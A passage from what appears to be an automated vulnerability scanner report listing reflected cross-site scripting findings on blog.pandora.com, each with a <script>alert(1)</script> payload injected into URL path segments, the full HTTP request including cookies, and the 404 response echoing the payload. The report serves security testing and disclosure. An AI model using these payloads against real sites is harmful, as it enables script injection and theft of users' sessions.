Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20097c9b0<script>alert(1)</script>b9522db024f/12/ was not found on this server.</p>
...[SNIP]...

3.232. http://blog.pandora.com/pandora/archives/2009/12/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/12/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9e75b<script>alert(1)</script>e4d44414054 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/129e75b<script>alert(1)</script>e4d44414054/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:35 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/129e75b<script>alert(1)</script>e4d44414054/ was not found on this server.</p>
...[SNIP]...

3.233. http://blog.pandora.com/pandora/archives/2010/01/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/01/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cc983<script>alert(1)</script>2400c298808 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoracc983<script>alert(1)</script>2400c298808/archives/2010/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoracc983<script>alert(1)</script>2400c298808/archives/2010/01/ was not found on this server.</p>
...[SNIP]...

3.234. http://blog.pandora.com/pandora/archives/2010/01/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/01/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8de66<script>alert(1)</script>475006746a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives8de66<script>alert(1)</script>475006746a0/2010/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives8de66<script>alert(1)</script>475006746a0/2010/01/ was not found on this server.</p>
...[SNIP]...

3.235. http://blog.pandora.com/pandora/archives/2010/01/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/01/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2e9cf<script>alert(1)</script>65e022c3582 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20102e9cf<script>alert(1)</script>65e022c3582/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:45 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20102e9cf<script>alert(1)</script>65e022c3582/01/ was not found on this server.</p>
...[SNIP]...

3.236. http://blog.pandora.com/pandora/archives/2010/01/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/01/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 61fb7<script>alert(1)</script>7b57931b113 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/0161fb7<script>alert(1)</script>7b57931b113/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/0161fb7<script>alert(1)</script>7b57931b113/ was not found on this server.</p>
...[SNIP]...

3.237. http://blog.pandora.com/pandora/archives/2010/02/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/02/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b45c8<script>alert(1)</script>6c1d1e3fb41 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorab45c8<script>alert(1)</script>6c1d1e3fb41/archives/2010/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorab45c8<script>alert(1)</script>6c1d1e3fb41/archives/2010/02/ was not found on this server.</p>
...[SNIP]...

3.238. http://blog.pandora.com/pandora/archives/2010/02/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/02/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c321c<script>alert(1)</script>4ec169aa6ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesc321c<script>alert(1)</script>4ec169aa6ab/2010/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:44 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesc321c<script>alert(1)</script>4ec169aa6ab/2010/02/ was not found on this server.</p>
...[SNIP]...

3.239. http://blog.pandora.com/pandora/archives/2010/02/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/02/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fa813<script>alert(1)</script>ceeadd94af1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010fa813<script>alert(1)</script>ceeadd94af1/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010fa813<script>alert(1)</script>ceeadd94af1/02/ was not found on this server.</p>
...[SNIP]...

3.240. http://blog.pandora.com/pandora/archives/2010/02/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/02/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 57830<script>alert(1)</script>60d006b3a3f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/0257830<script>alert(1)</script>60d006b3a3f/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:50 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/0257830<script>alert(1)</script>60d006b3a3f/ was not found on this server.</p>
...[SNIP]...

3.241. http://blog.pandora.com/pandora/archives/2010/03/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/03/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 23646<script>alert(1)</script>c3ee8c2d938 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora23646<script>alert(1)</script>c3ee8c2d938/archives/2010/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora23646<script>alert(1)</script>c3ee8c2d938/archives/2010/03/ was not found on this server.</p>
...[SNIP]...

3.242. http://blog.pandora.com/pandora/archives/2010/03/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/03/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1b658<script>alert(1)</script>a757f005820 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives1b658<script>alert(1)</script>a757f005820/2010/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives1b658<script>alert(1)</script>a757f005820/2010/03/ was not found on this server.</p>
...[SNIP]...

3.243. http://blog.pandora.com/pandora/archives/2010/03/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/03/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 490a0<script>alert(1)</script>2b229393208 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010490a0<script>alert(1)</script>2b229393208/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010490a0<script>alert(1)</script>2b229393208/03/ was not found on this server.</p>
...[SNIP]...

3.244. http://blog.pandora.com/pandora/archives/2010/03/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/03/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8018f<script>alert(1)</script>0037f1ec75a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/038018f<script>alert(1)</script>0037f1ec75a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/038018f<script>alert(1)</script>0037f1ec75a/ was not found on this server.</p>
...[SNIP]...

3.245. http://blog.pandora.com/pandora/archives/2010/04/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/04/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bb4ba<script>alert(1)</script>cf73c74ede8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorabb4ba<script>alert(1)</script>cf73c74ede8/archives/2010/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:31 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorabb4ba<script>alert(1)</script>cf73c74ede8/archives/2010/04/ was not found on this server.</p>
...[SNIP]...

3.246. http://blog.pandora.com/pandora/archives/2010/04/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/04/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5d94d<script>alert(1)</script>f0d1317d4a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives5d94d<script>alert(1)</script>f0d1317d4a9/2010/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives5d94d<script>alert(1)</script>f0d1317d4a9/2010/04/ was not found on this server.</p>
...[SNIP]...

3.247. http://blog.pandora.com/pandora/archives/2010/04/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/04/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c7e3f<script>alert(1)</script>451f1300ac6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010c7e3f<script>alert(1)</script>451f1300ac6/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010c7e3f<script>alert(1)</script>451f1300ac6/04/ was not found on this server.</p>
...[SNIP]...

3.248. http://blog.pandora.com/pandora/archives/2010/04/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/04/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cb7b3<script>alert(1)</script>c9a6d62cd0b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/04cb7b3<script>alert(1)</script>c9a6d62cd0b/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
